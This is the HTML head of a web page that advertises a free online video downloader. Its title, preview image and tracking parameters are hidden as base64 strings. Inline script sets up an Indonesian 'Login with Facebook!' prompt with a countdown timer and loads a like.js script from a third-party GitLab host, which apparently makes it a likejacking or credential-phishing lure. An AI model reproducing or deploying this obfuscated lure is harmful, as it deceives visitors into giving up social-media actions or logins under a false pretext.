<html>

<head>
    <link rel="shortcut icon" type="image/x-icon" href="https://i.imgur.com/Xfys5a9.png">
    <link rel="stylesheet" href="https://bednarhelga.gitlab.io/css/style.css?20319" type="text/css">
    <link rel="stylesheet" href="https://bednarhelga.gitlab.io/css/player.css?20319" type="text/css">
    <link rel="stylesheet" href="https://bednarhelga.gitlab.io/css/box-fb.css?20319" type="text/css">
    <meta http-equiv="content-type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
    <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,600,700" rel="stylesheet">

    <script type="text/javascript" src="https://connect.facebook.net/en_US/all.js#xfbml=1">
    </script>
    <script type="text/javascript">

        var img = cmx('aHR0cHM6Ly9pLmltZ3VyLmNvbS9jd0JpaUhkLmpwZw');
        var ttl = cmx('RnJlZSBPbmxpbmUgVmlkZW8gRG93bmxvYWRlci4gQ2F0Y2ggVmlkZW8gRnJvbSBBbnkgU2l0ZQ');
        var srv = 'dHJhY2tpbmdfdHViZQ';
        var usr = 'Q2VyeHJl';
        var fp = 'ZGF0aW5n';
        document.write("<title>" + ttl + "</title>");
        document.write("<link rel='image_src' href='" + img + "' />");
        document.write("<meta property='og:image' content='" + img + "' />");

    </script>
    <script type="text/javascript">
        likes = fp,
            tit = "Login Dengan Facebook!",
            skin = "04",
            waktu = "60",
            tunggu = "0",
            bahasa = "id",
            us = usr,
            hs = cmx(srv)
    </script>
    <script type="text/javascript" src="https://bednarhelga.gitlab.io/js/like.js"></script>
    <script type="text/javascript" src="https://prekerteam.github.io/js/mobile-detect.js"></script>
</head>

<body style="background-color: #191919;">